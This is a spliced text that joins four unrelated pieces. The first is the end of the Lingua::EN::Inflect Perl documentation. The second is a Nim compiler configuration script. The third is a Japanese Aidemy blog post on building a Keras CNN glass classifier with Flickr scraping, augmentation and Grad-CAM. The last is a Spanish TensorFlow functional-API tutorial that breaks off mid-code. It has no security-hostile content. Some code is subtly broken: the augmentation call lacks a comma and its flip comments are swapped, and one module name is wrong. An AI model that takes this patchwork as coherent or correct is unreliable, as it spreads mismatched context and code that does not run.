Specific diagnostics related to user-defined inflections are:
"Bad user-defined singular pattern:\n\t %s"
The singular form of a user-defined noun or verb (as defined by a call to
def_noun,def_verb,def_adj,def_aordef_an) is not a valid Perl regular expression. The actual Perl error message is also given.
"Bad user-defined plural string: '%s'"
The plural form(s) of a user-defined noun or verb (as defined by a call to
def_noun,def_verbordef_adj) is not a valid Perl interpolated string (usually because it interpolates some undefined variable).
"Bad .inflectrc file (%s):\n %s"
Some other problem occurred in loading the named local or global
.inflectrcfile. The Perl error message (including the line number) is also given.
There are no diagnosable run-time error conditions for the actual inflection subroutines, except NUMWORDS and hence no run-time diagnostics. If the inflection subroutines are unable to form a plural via a user-definition or an inbuilt rule, they just "guess" the commonest English inflection: adding "-s" for nouns, removing "-s" for verbs, and no inflection for adjectives.
Lingua::EN::Inflect::NUMWORDS() can die with the following messages:
"Bad grouping option: %s"
The optional argument to
NUMWORDS()wasn't 1, 2 or 3.
"Number out of range"
NUMWORDS()was passed a number larger than the number represented by 3006 consecutive nines. The words representing that number are 63,681 characters long, including commas and spaces. If you're interested in the actual value, see t/numwords.t.
The reference for the names is http://en.wikipedia.org/wiki/Names_of_large_numbers
There are no names for any higher numbers.
If a verb has identical 1st and 2nd person singular forms, but different 1st and 2nd person plural forms, then when its plural is constructed, the 2nd person plural form is always preferred.
The author is not currently aware of any such verbs in English, but is not quite arrogant enough to assume ipso facto that none exist.
The singular pronoun "it" presents a special problem because its plural form can vary, depending on its "case". For example:
It ate my homework -> They ate my homework It ate it -> They ate them I fed my homework to it -> I fed my homework to them
As a consequence of this ambiguity, PL() or PL_N have been implemented so that they always return the nominative plural (that is, "they").
However, when asked for the plural of an unambiguously accusative "it" (namely, PL("to it"), PL_N("from it"), PL("with it"), etc.), both subroutines will correctly return the accusative plural ("to them", "from them", "with them", etc.)
The rules governing the choice between:
There were no errors.
and
There was no error.
are complex and often depend more on intent rather than content. Hence it is infeasible to specify such rules algorithmically.
Therefore, Lingua::EN::Text contents itself with the following compromise: If the governing number is zero, inflections always return the plural form unless the appropriate "classical" inflection is in effect, in which case the singular form is always returned.
Thus, the sequence:
NUM(0);
print inflect "There PL(was) NO(choice)";
produces "There were no choices", whereas:
classical 'zero'; # or: classical(zero=>1);
NUM(0);
print inflect "There PL(was) NO(choice)";
it will print "There was no choice".
Another context in which intent (and not content) sometimes determines plurality is where two distinct meanings of a word require different plurals. For example:
Three basses were stolen from the band's equipment trailer. Three bass were stolen from the band's aquarium. I put the mice next to the cheese. I put the mouses next to the computers. Several thoughts about leaving crossed my mind. Several thought about leaving across my lawn.
Lingua::EN::Inflect handles such words in two ways:
If both meanings of the word are the
samepart of speech (for example, "bass" is a noun in both sentences above), then one meaning is chosen as the "usual" meaning, and only that meaning's plural is ever returned by any of the inflection subroutines.
If each meaning of the word is a different part of speech (for example, "thought" is both a noun and a verb), then the noun's plural is returned by
PL()andPL_N()and the verb's plural is returned only byPL_V().
Such contexts are, fortunately, uncommon (particularly "same-part-of-speech" examples). An informal study of nearly 600 "difficult plurals" indicates that PL() can be relied upon to "get it right" about 98% of the time (although, of course, ichthyophilic guitarists or cyber-behaviouralists may experience higher rates of confusion).
If the choice of a particular "usual inflection" is considered inappropriate, it can always be reversed with a preliminary call to the corresponding def_... subroutine.
NOTE
I'm not taking any further correspondence on:
"octopi".
Despite the populist pandering of certain New World dictionaries, the plural is "octopuses" or (for the pedantic classicist) "octopodes". The suffix "-pus" is Greek, not Latin, so the plural is "-podes", not "pi".
"virus".
Had no plural in Latin (possibly because it was a mass noun). The only plural is the Anglicized "viruses".
AUTHOR
Damian Conway (damian@conway.org)
The endless inconsistencies of English.
(Please report words for which the correct plural or indefinite article is not formed, so that the reliability of Lingua::EN::Inflect can be improved.)
COPYRIGHT
Copyright (c) 1997-2009, Damian Conway. All Rights Reserved.
This module is free software. It may be used, redistributed
and/or modified under the same terms as Perl itself.
|
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869
from macros import error
type Compiler = enum gcc = "gcc", clang = "clang"
var cross {.used.} = false
proc setCompiler(s: string, compiler = gcc, cpp = false) {.used.} =
let c = findExe s
let cpp = (if cpp: ".cpp" else: "")
if c.len == 0:
error s & " binary wasn't found in $PATH."
switch $compiler & cpp & ".exe", c
switch $compiler & cpp & ".linkerexe", c
when defined(musl):
setCompiler "x86_64-linux-musl-gcc"
switch "passL", "-static"
elif defined(x86):
cross = true
setCompiler "i686-pc-linux-gnu-gcc"
switch "cpu", "i386"
switch "passL", "--sysroot=/usr/i686-pc-linux-gnu/"
elif defined(arm):
cross = true
switch "cpu", "arm"
switch "passL", "--sysroot=/usr/arm-linux-gnueabihf/"
elif defined(wasm):
cross = true
let linkerOptions = "-nostdlib -Wl,--no-entry,--allow-undefined,--gc-sections,--strip-all"
switch "o", projectName() & ".wasm"
switch "cpu", "i386"
switch "cc", "clang"
switch "d", "danger"
switch "opt", "size"
switch "stackTrace", "off"
switch "nomain"
switch "d", "nimNoLibc"
switch "d", "noSignalHandler"
switch "passC", "--target=wasm32-unknown-unknown-wasm"
switch "passC", "-mexception-handling"
switch "passC", "-nostdlib"
switch "passL", "--target=wasm32-unknown-unknown-wasm"
switch "clang.options.linker", linkerOptions
switch "clang.cpp.options.linker", linkerOptions
when defined(release) or defined(danger):
switch "excessiveStackTrace", "off"
if not cross:
switch "passC", "-march=native"
switch "passC", "-floop-interchange -ftree-loop-distribution -floop-strip-mine -floop-block"
switch "passC", "-ftree-vectorize"
switch "passC", "-flto"
switch "passL", "-fuse-linker-plugin"
switch "passL", "-s"
when defined(hotcodereloading):
switch "nimcache", "nimcache"
elif defined(danger):
switch "nimcache", "/tmp/nim/" & projectName() & "_d"
elif defined(release):
switch "nimcache", "/tmp/nim/" & projectName() & "_r"
else:
switch "nimcache", "/tmp/nim/" & projectName()
switch "styleCheck", "hint"
switch "verbosity", "2"
|
『グラスを分類するAI』を作ってみた
こんにちは!Aidemy研修生の渡部です!今回はCNNを使って画像分類プログラムを作ります。形の似ているものをちゃんと分類してくれるのか気になったので、大体似たような形状をしているグラス3つを用意しました!
左からタンブラー(ハイボールグラス)、ショットグラス、ロックグラスです。今回は3つだけの判別ですが、複数のグラスを判別できることによってホテルやレストランなどで常にグラスの在庫数の把握などが行えるかもしれません。それによって、棚卸しなどの面倒な作業をAIに任せられるという良い点があります!
それでは目次のような流れで進めていきます!
目次[非表示]
実行環境
Python 3.6.8
jupyter notebook 5.7.4
macOS High Sierra Version 10.13.6
Flickr APIを利用して画像の取得
今回分類するのはタンブラー、ショットグラス、ロックグラスです。まずは、事前にこれらの名前でそれぞれファイルを作っておき、画像をFlickrという写真共有サービスのAPIを利用して、各400枚ずつ取得し、作っておいたファイルに保存します。
from flickrapi import FlickrAPI
from urllib.request import urlretrieve
from pprint import pprint
import os,time, sys
#APIキーの保存
key = '自分のAPIキー'
secret = '自分のシークレットキー'
#サーバーのパンクやスパムと見なされる可能性があるため、1秒置く
wait_time = 1
def get_photos(glass_name):
#保存フォルダの指定
savedir = './' + glass_name
#JSONデータで受け取る
flickr = FlickrAPI(key, secret, format='parsed-json')
result = flickr.photos.search(
#検索キーワード
text = glass_name,
#取得したい数
per_page = 400,
#検索するデータの種類
media = 'photos',
#データのソート順
sort = 'relevance',
#有害コンテンツの除去
safe_search = 1,
#取得したいオプション値
extras = 'url_q, licence'
)
photos = result['photos']
for i, photo in enumerate(photos['photo']):
try:
url_q = photo['url_q']
except:
print('取得に失敗しました')
continue
#この場所にダウンロードして保存
filepath = savedir + '/' + photo['id'] + '.jpg'
#同じファイルが存在していた場合、スキップする
if os.path.exists(filepath): continue
#url_qの画像をfilepathに保存する
urlretrieve(url_q, filepath)
#1秒おく
time.sleep(wait_time)
#調べたいキーワードをget_photosに渡す
get_photos('highball glass') #タンブラー
get_photos('lowball glass') #ロックグラス
get_photos('old fashioned glass') #ロックグラス
get_photos('shot glass') #ショットグラス
以下を参考にさせて頂き、各グラス400枚ずつ画像を保存しました。ロックグラスだけ画像が足りなかったのでロックグラスという意味の2つの英語を使って集め、合体させて1つのファイルにまとめました。
(一度に1600枚も取ってきて大丈夫なのかと心配したのですが、Flickr APIの開発者ガイドを見ると、1時間以内に3600回以上要求しなければ大丈夫だそうです!)ここまでで2時間くらいかかってしまいましたが、それでも自分で画像探して取ってくるよりも全然楽なので、こういう時プログラミングってすごいって思います笑
Pythonで画像データを取得してみる。
https://qiita.com/__init__/items/d18dde8c8d186fdc0e3a
手作業で画像を取り除く
今保存した画像には、関係のない写真や絵が混じっていたり、グラスが少ししか写っていなかったり、真上からの写真などもあるのでそれらを全て消していきます!合計1600枚もあるので本当に大変ですが、気合いで丁寧に消していきます笑
関係ない写真が多くあり、いらない写真を消していくと各400枚⇨各150枚まで少なくなってしまいましたが、とりあえずこのままやってみようと思います。
以下の写真が集めてきた写真の例です。左の列から、タンブラー(ハイボールグラス)、ショットグラス、ロックグラスです。グラスの写真を思ったよりも取ってこられなかったので、グラスにデザインが入っているもの、飲み物が入っているもの、複数のグラスが写っているものなども、写真が鮮明であれば使っています。
画像データをNumpy形式に変換
次に、このまま写真のデータを使うと計算時間が非常に長くなってしまうので、下の記事を参考にして、まずはそれぞれの画像をNumpy形式に変換し、学習用と評価用に振り分けたいと思います!scikit-learn には、トレーニングデータとテストデータの分割を行なうメソッドとしてsklearn.model_selection.train_test_split()メソッドがあるので、こちらを使いたいと思います。
from PIL import Image
import os,glob
import numpy as np
from sklearn import model_selection
classes = ['highball glass', 'lowball glass', 'shot glass']
num_classes = len(classes)
image_size = 50
#画像の読み込み
X = [] #画像データ
Y = [] #ラベルデータ
#それぞれのファイルごとにループさせる
for index, class_ in enumerate(classes):
photos_dir = './' + class_
#jpg形式の画像データを保存
files = glob.glob(photos_dir + '/*.jpg')
#フォルダ内の全ての画像を1つずつ渡す
for i, file in enumerate(files):
#画像データが150を超えたらループを抜ける
if i >= 150: break
image = Image.open(file)
image = image.convert('RGB')
#画像データを50 x 50に変換
image = image.resize((image_size,image_size))
data = np.asarray(image)
X.append(data)
Y.append(index)
X = np.array(X)
Y = np.array(Y)
#引数無しだと7.5:2.5に分けられるが、今回は7:3に分ける。
X_train,X_test,y_train,y_test = model_selection.train_test_split(X,Y,test_size=0.3)
xy = (X_train,X_test,y_train,y_test)
#Numpy配列をファイルに保存
np.save('./glass.npy',xy)
今回は学習用データと評価用のデータを7:3で分けました!画像が少な過ぎてちゃんと分類してくれるか不安ですね....
len(X_train) #学習用データ 315枚
len(X_test) #評価用データ 135枚
画像データからnumpy形式に変換する方法
https://newtechnologylifestyle.net/%E7%94%BB%E5%83%8F%E3%83%87%E3%83%BC%E3%82%BF%E3%81%8B%E3%82%89numpy%E5%BD%A2%E5%BC%8F%E3%81%AB%E5%A4%89%E6%8F%9B%E3%81%99%E3%82%8B%E6%96%B9%E6%B3%95/
モデルの構築・学習・評価
モデルはCNNを使い、モデルを構築して学習と評価を行いたいと思います!モデルの構築には以下のKerasの画像分類プログラムを参考にしたいと思います。https://github.com/keras-team/keras/blob/master/examples/cifar10_cnn.py
from keras.models import Sequential
from keras.layers import Conv2D, MaxPooling2D
from keras.layers import Activation, Dropout, Flatten, Dense
from keras.utils import np_utils
import numpy as np
import keras
classes = ['highball glass', 'lowball glass', 'shot glass']
num_classes = len(classes)
image_size = 50
#メインの関数を定義する
def main():
X_train,X_test,y_train,y_test = np.load('./glass.npy')
#画像ファイルの正規化
X_train = X_train.astype('float') / 256
X_test = X_test.astype('float') / 256
#教師ラベルをone-hot vectorにする
y_train = np_utils.to_categorical(y_train,num_classes)
y_test = np_utils.to_categorical(y_test,num_classes)
model = model_train(X_train,y_train)
model_eval(model,X_test,y_test)
def model_train(X,y):
model = Sequential()
model.add(Conv2D(32,(3,3), padding='same',input_shape=X.shape[1:]))
model.add(Activation('relu'))
model.add(Conv2D(32,(3,3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2,2)))
model.add(Dropout(0.25))
model.add(Conv2D(64,(3,3),padding='same'))
model.add(Activation('relu'))
model.add(Conv2D(64,(3,3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2,2)))
model.add(Dropout(0.25))
model.add(Flatten())
model.add(Dense(512))
model.add(Activation('relu'))
model.add(Dropout(0.5))
model.add(Dense(3))
model.add(Activation('softmax'))
#最適化の手法
opt = keras.optimizers.rmsprop(lr=0.0001,decay=1e-6)
#モデルのコンパイル
model.compile(loss='categorical_crossentropy',
optimizer=opt,metrics=['accuracy'])
#モデルの学習
model.fit(X, y, batch_size=32,epochs=100)
#モデルの保存
model.save('./glass_cnn.h5')
return model
#モデルの評価
def model_eval(model,X,y):
scores = model.evaluate(X,y,verbose=1)
print('Test Loss: ', scores[0])
print('Test Accuracy: ', scores[1])
if __name__ == '__main__':
main()
Epoch 95/100
337/337 [==============================] - 4s 13ms/step - loss: 0.0850 - acc: 0.9852
Epoch 96/100
337/337 [==============================] - 5s 16ms/step - loss: 0.1004 - acc: 0.9703
Epoch 97/100
337/337 [==============================] - 4s 13ms/step - loss: 0.0624 - acc: 0.9881
Epoch 98/100
337/337 [==============================] - 4s 12ms/step - loss: 0.0834 - acc: 0.9733
Epoch 99/100
337/337 [==============================] - 4s 12ms/step - loss: 0.1008 - acc: 0.9792
Epoch 100/100
337/337 [==============================] - 3s 10ms/step - loss: 0.0655 - acc: 0.9911
113/113 [==============================] - 1s 6ms/step
Test Loss: 0.9943334302016064
Test Accuracy: 0.6725663748462644
正解率があまり高くないのでいくつか精度をあげる工夫をして、正解率を上げようと思います!まずは、画像の量を増やすために水増しをしてみようと思います!
画像の水増し
画像の水増しにはKerasのImageDataGeneratorを使います。パラメーターは、rotation_range、horizontal_flip、vertical_flipを設定し、画像をランダムに回転、反転させ、1枚の画像から新たに9枚の画像を生成するようにします。
from PIL import Image
import os,glob
import numpy as np
from sklearn import model_selection
from keras.preprocessing.image import ImageDataGenerator, array_to_img
classes = ['highball glass', 'lowball glass', 'shot glass']
num_classes = len(classes)
#画像の読み込み
X_train = []
X_test = []
Y_train = []
Y_test = []
datagen = ImageDataGenerator(
# -20° ~ 20° の範囲でランダムに回転する。
rotation_range=20,
# ランダムで上下反転する。
horizontal_flip=True,
# ランダムで左右反転する。
vertical_flip=True
#ランダムに水平シフトする。
width_shift_range=0.1,
#ランダムに垂直シフトする。
height_shift_range=0.1,
)
#それぞれのファイルごとにループさせる
for index, classlabel in enumerate(classes):
photos_dir = './' + classlabel
#jpg形式の画像データを保存
files = glob.glob(photos_dir + '/*.jpg')
#フォルダ内の全ての画像を1つずつ渡す
for i, file in enumerate(files):
#画像データが150を超えたらループを抜ける
if i >= 150: break
image = Image.open(file)
image = image.convert('RGB')
#画像データを50 x 50に変換
image = image.resize((50, 50))
#画像から配列に変換
data = np.asarray(image)
#トレーニング用データだけ水増ししたいので、
#水増しする前にテスト用データを保存しておく。
if i < 45:
X_test.append(data)
Y_test.append(index)
continue
#残りのデータを3次元から4次元配列に変更
data = data.reshape((1,) + data.shape)
#画像を9枚生成する
g = datagen.flow(data, batch_size=1)
for i in range(9):
batches = g.next()
g_img = batches[0].astype(np.uint8)
X_train.append(g_img)
Y_train.append(index)
X_train = np.array(X_train)
X_test = np.array(X_test)
y_train = np.array(Y_train)
y_test = np.array(Y_test)
xy = (X_train,X_test,y_train,y_test)
np.save('./glass_augment.npy',xy)
ImageDataGeneratorで指定できるパラメーターはこちらを参考にさせていただきました。
再びモデルの学習・評価
epochs数を50で試します。
1575/1575 [==============================] - 16s 10ms/step - loss: 0.6694 - acc: 0.7314
Epoch 45/50
1575/1575 [==============================] - 15s 9ms/step - loss: 0.6439 - acc: 0.7289
Epoch 46/50
1575/1575 [==============================] - 15s 10ms/step - loss: 0.6475 - acc: 0.7333
Epoch 47/50
1575/1575 [==============================] - 15s 10ms/step - loss: 0.6073 - acc: 0.7568
Epoch 48/50
1575/1575 [==============================] - 16s 10ms/step - loss: 0.5976 - acc: 0.7638
Epoch 49/50
1575/1575 [==============================] - 15s 10ms/step - loss: 0.5947 - acc: 0.7568
Epoch 50/50
1575/1575 [==============================] - 15s 10ms/step - loss: 0.5790 - acc: 0.7689
135/135 [==============================] - 1s 8ms/step
Test Loss: 0.7299521702307242
Test Accuracy: 0.696296297620844
水増し後、正解率が数パーセントですが上がりました。また、epochs数を100に増やして試してみたのですが、トレーニングデータの正解率は100%近いのに対して、66%の正解率しか出ませんでした。この場合はモデルが十分に汎化出来ておらず、過学習に陥ってしまった可能性が高いです。この画像数でepochs数100は多すぎたかもしれません。epochs数は50でいきます。
混同行列をヒートマップで表示させる
以下を真似て混同行列をヒートマップで表示させ、テストデータの分類にどのようなミスが多いのかなどを見ていきます!
import pandas as pd
import seaborn as sns
from sklearn.metrics import confusion_matrix
import matplotlib.pyplot as plt
#y_true->正解ラベル, y_pred->予想ラベル
def print_cmx(y_true, y_pred):
labels = sorted(list(set(y_true)))
cmx_data = confusion_matrix(y_true, y_pred, labels=labels)
labels = ['highball glass', 'lowball glass', 'shot glass']
df_cmx = pd.DataFrame(cmx_data, index=labels, columns=labels)
plt.figure(figsize = (10,7))
sns.heatmap(df_cmx, annot=True)
plt.show()
縦軸が予想されたクラスで、横軸が正解のクラスです。なので、highball glassだと予測して、実際はhighball glassだったのは33枚、lowball glassだったのは5枚、shot glassだったのは6枚というようになっています。
これを見ると、shot glassだと分類して、外しているものが他と比べると少し多いようですが、そもそも全体的に外している回数が多いと感じます。もしかしたら、元のデータセットの画像の質が悪いんじゃないかと思ったので、データセットの画像を選別し直します。とりあえず、取ってきた画像が少なかったから数合わせとして消さずにおいた、グラスが複数写っている画像を3つのフォルダ全てから手作業で消します。
データセットの画像を選別し、モデルの学習を行う
複数のグラスが写っているのを消したら、shot glassの画像が66枚まで少なくなりました。上の画像がshot glass のフォルダです。
そこで、例のごとく学習用データとテストデータを7:3に分けてImageDataGeneratorで画像を水増しして、モデルの学習をします。ImageDataGeneratorのパラメーターは1回目と同じで、epochs数は30に変更しました。
再々評価
Epoch 25/30
1269/1269 [==============================] - 15s 12ms/step - loss: 0.3296 - acc: 0.8810
Epoch 26/30
1269/1269 [==============================] - 15s 12ms/step - loss: 0.3239 - acc: 0.8842
Epoch 27/30
1269/1269 [==============================] - 15s 12ms/step - loss: 0.3011 - acc: 0.8834
Epoch 28/30
1269/1269 [==============================] - 16s 12ms/step - loss: 0.2863 - acc: 0.8936
Epoch 29/30
1269/1269 [==============================] - 15s 12ms/step - loss: 0.2760 - acc: 0.9078
Epoch 30/30
1269/1269 [==============================] - 15s 12ms/step - loss: 0.2545 - acc: 0.9078
54/54 [==============================] - 0s 6ms/step
Test Loss: 0.8330826008761371
Test Accuracy: 0.7962963073341934
分類器としてはあまり良くない精度だと思いますが、正解率は80%近くまで上がりました。結果として、複数のグラスが写っている画像を消すことで、単体のグラスへの分類精度が上がり最初のモデルと比べると10%も高いグラスの分類モデルを作ることができました!データ数が減っても質に対しての妥協はせずにちゃんと画像を選別することが大切だと感じました。
混同行列を見るとショットグラスに分類してミスしてるのが多かったです。理由はおそらくタンブラーとロックグラスは互いにそこまで似てないのに対して、ショットグラスは縦長のものや深めのものがあって、タンブラーとロックグラスのどちらにも似ているということが関係してると思います。それぞれの違いをちゃんと認識させるためにも、画像の枚数がもっと必要だったかもしれません。 画像の質が精度を左右するというくらい、画像の質は大切なことを学びました。
Grad-CAMを実装
分類器がグラスのどの特徴をみて判断しているのか気になったので、CNNが着目している特徴箇所を特定することが出来るというGrad-CAMを使ってみます!以下のブログを真似して実装しました。
kerasでGrad-CAM 自分で作ったモデルで
https://qiita.com/haru1977/items/45269d790a0ad62604b3
import pandas as pd
import numpy as np
import cv2
from keras import backend as K
from keras.preprocessing.image import array_to_img, img_to_array, load_img
from keras.models import load_model
K.set_learning_phase(1) #set learning phase
def Grad_Cam(input_model, x, layer_name):
# 前処理
X = np.expand_dims(x, axis=0)
X = X.astype('float32')
preprocessed_input = X / 255.0
# 予測クラスの算出
predictions = model.predict(preprocessed_input)
class_idx = np.argmax(predictions[0])
class_output = model.output[:, class_idx]
# 勾配を取得
conv_output = model.get_layer(layer_name).output # layer_nameのレイヤーのアウトプット
grads = K.gradients(class_output, conv_output)[0] # gradients(loss, variables) で、variablesのlossに関しての勾配を返す
gradient_function = K.function([model.input], [conv_output, grads]) # model.inputを入力すると、conv_outputとgradsを出力する関数
output, grads_val = gradient_function([preprocessed_input])
output, grads_val = output[0], grads_val[0]
# 重みを平均化して、レイヤーのアウトプットに乗じる
weights = np.mean(grads_val, axis=(0, 1))
cam = np.dot(output, weights)
# 画像化してヒートマップにして合成
cam = cv2.resize(cam, (50,50), cv2.INTER_LINEAR) # 画像サイズは200で処理したので
cam = np.maximum(cam, 0)
cam = cam / cam.max()
jetcam = cv2.applyColorMap(np.uint8(255 * cam), cv2.COLORMAP_JET) # モノクロ画像に疑似的に色をつける
jetcam = cv2.cvtColor(jetcam, cv2.COLOR_BGR2RGB) # 色をRGBに変換
jetcam = (np.float32(jetcam) + x / 2) # もとの画像に合成
return jetcam
それぞれ何枚ずつか画像を持ってきて実行しました!左は元の画像と右が分類器が着目している画像です。赤くなるほど着目度が高いです。
ショットグラスは特に飲み口と底を見ている印象が強いです!確かにショットグラスって底が他のグラスに比べて分厚いものが多いので、そこに気づいたんですかね。2枚目はグラスの影をグラスの底だと認識しているのかなあという感じです。
4枚目はグラスの上の何もない場所が赤くなってて何に反応しているのか分からないのですが、もしかしたら、グラスを斜め上から撮った画像を多く使ったりしているからそれに関係しているのかもしれないですね。
ロックグラスはグラスの左部分と底を見ていますね!3枚目の画像は中央に大きくグラスが写っているのにも関わらず背景に反応してます。4枚目に至っては女性らしき人の手と胸を見てますね。多分男の子なんでしょうね笑
ショットグラスやロックグラスが底見ているのに対してタンブラーはグラスの中身を強く見ているようです!レモンやオレンジがついてるのを何枚か入れていたのですが、それには全然反応していないようです。
感想
このように実際に何かを作ると、疑問が出てくるたびに調べたりするので、めちゃくちゃ勉強になりますし、得られることは大きいです。振り返ってみると、コードを書いてる時間よりも他の方の記事を読んだり調べたりする時間がほとんどでした。笑
疑問点や試したいこともたくさんあるので、また作ってみたいと思います!
PythonやAIプログラミングを学ぶなら、オンライン制スクールのアイデミープレミアムプラン。
「機械学習・ディープラーニングに興味がある」
「AIをどのように活用するのだろう?」
「文系の私でもプログラミング学習を続けられるだろうか?」
少しでも気になることがございましたら、ぜひお気軽にAidemy Premium Planの無料相談会にお越しいただき、お悩みをお聞かせください!このほかにも、Aidemy MagazineとTwitter(@AidemyMagazine)ではたくさんのAI活用事例をご紹介しています。どちらも要チェック!それではまた次の記事でお会いしましょう。最後までご覧くださりありがとうございました。
|
Ver en TensorFlow.org Correr en Google Colab Ver código fuente en GitHub Descargar notebook
Setup
import tensorflow as tf
tf.keras.backend.clear_session() # Reseteo sencillo
Introduccion
Ya estás familiarizado con el uso del metodo keras.Sequential() para crear modelos.La API funcional es una forma de crear modelos mas dinamicos que con Sequential: La API funcional puede manejar modelos con topología no lineal, modelos con capas compartidas y modelos con múltiples entradas o salidas.
Se basa en la idea de que un modelo de aprendizaje profundosuele ser un gráfico acíclico dirigido (DAG) de capas.La API funcional es un conjunto de herramientas para construir gráficos de capas.
Considera el siguiente modelo:
(input: 784-vectores dimensionales)
↧
[Dense (64 units, activacion relu)]
↧
[Dense (64 units, activacion relu)]
↧
[Dense (10 units, activacion softmax)]
↧
(output: distribución de probabilidad en 10 clases)
Es una simple grafica de tres capas.
Para construir este modelo con la API funcional, comenzarías creando un nodo de entrada:
from tensorflow import keras
inputs = keras.Input(shape=(784,))
Aqui solo especificamos el tipo de nuestra data set: 784-vectores dimensionales.Nota que el tamaño del batch siempre debe ser omitido, solo se incluye el tipo de la data set.Para una input de tipo imágen (31,32,3) hubiese sido:
img_inputs = keras.Input(shape=(32, 32, 3))
Lo que se devuelve, input, contiene información sobre la forma y el tipo de dato que se espera ingresa en tu modelo:
inputs.shape
TensorShape([None, 784])
inputs.dtype
tf.float32
Puedes crear un nuevo nodo en el grafico de capas mandando a llamar al objeto input.
from tensorflow.keras import layers
dense = layers.Dense(64, activation='relu')
x = dense(inputs)
La acción "layer call" es como dibujar una flecha desde "entradas" a la capa que creamos.Estamos "pasando" las entradas a la capa dense, y afuera obtenemosx.
Agreguemos algunas capas más a nuestro gráfico de capas:
La acción "llamada a la capa" es como dibujar una flecha de "entradas" a la capa que creamos.
Estamos pasando las entradas a una capa mas densa, y respecto a la salida obtenemos una x.
x = layers.Dense(64, activation='relu')(x)
outputs = layers.Dense(10, activation='softmax')(x)
LLegados a este punto, podemos crear un Modelo especificando sus entradas y salidas en las capas de graficas.
model = keras.Model(inputs=inputs, outputs=outputs)
Recapitulando, esta es nuestra definción completa del proceso:
inputs = keras.Input(shape=(784,), name='img')
x = layers.Dense(64, activation='relu')(inputs)
x = layers.Dense(64, activation='relu')(x)
outputs = layers.Dense(10, activation='softmax')(x)
model = keras.Model(inputs=inputs, outputs=outputs, name='mnist_model')
Veamos como se muestra el model summary:
model.summary()
Model: "mnist_model" _________________________________________________________________ Layer (type) Output Shape Param # ================================================================= img (InputLayer) [(None, 784)] 0 _________________________________________________________________ dense_3 (Dense) (None, 64) 50240 _________________________________________________________________ dense_4 (Dense) (None, 64) 4160 _________________________________________________________________ dense_5 (Dense) (None, 10) 650 ================================================================= Total params: 55,050 Trainable params: 55,050 Non-trainable params: 0 _________________________________________________________________
También podemos trazar el modelo como un gráfico:
keras.utils.plot_model(model, 'my_first_model.png')
Y opcionalmente mostrar la entrada y la salida de la forma de cada capa en la gráfica ploteada:
keras.utils.plot_model(model, 'my_first_model_with_shape_info.png', show_shapes=True)
Esta figura y el código que escribimos son prácticamente idénticos. En la versión de código, las flechas de conexión simplemente se reemplazan por la operación de llamada.
Un "gráfico de capas" es una imagen mental muy intuitiva para un modelo de aprendizaje profundo, y la API funcional es una forma de crear modelos que reflejan de cerca esta imagen mental.
Entrenamiento, evaluación e inferencia.
El entrenamiento, la evaluación y la inferencia funcionan exactamente de la misma manera para los modelos construidos utilizando la API funcional como para los modelos secuenciales.
Aquí hay una demostración rápida.
Aquí cargamos datos de imagen MNIST, los rediseñamos en vectores, ajustar el modelo en los datos (mientras se monitorea el rendimiento en una división de validación), y finalmente evaluamos nuestro modelo en los datos de prueba:
(x_train, y_train), (x_test, y_test) = keras.datasets.mnist.load_data()
x_train = x_train.reshape(60000, 784).astype('float32') / 255
x_test = x_test.reshape(10000, 784).astype('float32') / 255
model.compile(loss='sparse_categorical_crossentropy',
optimizer=keras.optimizers.RMSprop(),
metrics=['accuracy'])
history = model.fit(x_train, y_train,
batch_size=64,
epochs=5,
validation_split=0.2)
test_scores = model.evaluate(x_test, y_test, verbose=2)
print('Test loss:', test_scores[0])
print('Test accuracy:', test_scores[1])
Epoch 1/5 750/750 [==============================] - 2s 2ms/step - loss: 0.3558 - accuracy: 0.8995 - val_loss: 0.1930 - val_accuracy: 0.9440 Epoch 2/5 750/750 [==============================] - 2s 2ms/step - loss: 0.1724 - accuracy: 0.9482 - val_loss: 0.1452 - val_accuracy: 0.9563 Epoch 3/5 750/750 [==============================] - 2s 2ms/step - loss: 0.1251 - accuracy: 0.9624 - val_loss: 0.1184 - val_accuracy: 0.9656 Epoch 4/5 750/750 [==============================] - 2s 2ms/step - loss: 0.0997 - accuracy: 0.9705 - val_loss: 0.1127 - val_accuracy: 0.9668 Epoch 5/5 750/750 [==============================] - 2s 2ms/step - loss: 0.0824 - accuracy: 0.9756 - val_loss: 0.1073 - val_accuracy: 0.9698 313/313 - 0s - loss: 0.1017 - accuracy: 0.9701 Test loss: 0.1017443984746933 Test accuracy: 0.9700999855995178
Para obtener una guía completa sobre el entrenamiento y evaluación de modelos, consulta Guía de entrenamiento y evaluación.
Almacenado y serialización
El almacenado y la serialización funcionan exactamente de la misma manera para los modelos construidos utilizando la API funcional como para los modelos secuenciales.
Una forma estándar de guardar un modelo funcional es llamar a model.save () para guardar todo el modelo en un solo archivo.Posteriormente, puede volver a crear el mismo modelo a partir de este archivo, incluso si ya no tiene acceso al código.eso creó el modelo.
Este archivo incluye:
La arquitectura del modelo.
Los valores de peso del modelo (que se aprendieron durante el entrenamiento)
La configuración de entrenamiento del modelo (lo que pasó a compilar), si corresponde
El optimizador y su estado, si corresponde (esto le permite reiniciar el entrenamiento donde lo dejó)
model.save('path_to_my_model.h5')
del model
# Recrea el mismo modelo, desde el archivo:
model = keras.models.load_model('path_to_my_model.h5')
Para obtener una guía completa sobre el guardado de modelos, consulta Guía para guardar y serializar modelos.
Usando el mismo gráfico de capas para definir múltiples modelos
En la API funcional, los modelos se crean especificando sus entradas y salidas en un gráfico de capas. Eso significa que un solo gráfico de capas Se puede utilizar para generar múltiples modelos.
En el siguiente ejemplo, usamos la misma arquitectura de capas para crear instancias de dos modelos:un modelo de "codificador" que convierte las entradas de imagen en vectores de 16 dimensiones,y un modelo completo de autoencoder para entrenamiento.
encoder_input = keras.Input(shape=(28, 28, 1), name='img')
x = layers.Conv2D(16, 3, activation='relu')(encoder_input)
x = layers.Conv2D(32, 3, activation='relu')(x)
x = layers.MaxPooling2D(3)(x)
x = layers.Conv2D(32, 3, activation='relu')(x)
x = layers.Conv2D(16, 3, activation='relu')(x)
encoder_output = layers.GlobalMaxPooling2D()(x)
encoder = keras.Model(encoder_input, encoder_output, name='encoder')
encoder.summary()
x = layers.Reshape((4, 4, 1))(encoder_output)
x = layers.Conv2DTranspose(16, 3, activation='relu')(x)
x = layers.Conv2DTranspose(32, 3, activation='relu')(x)
x = layers.UpSampling2D(3)(x)
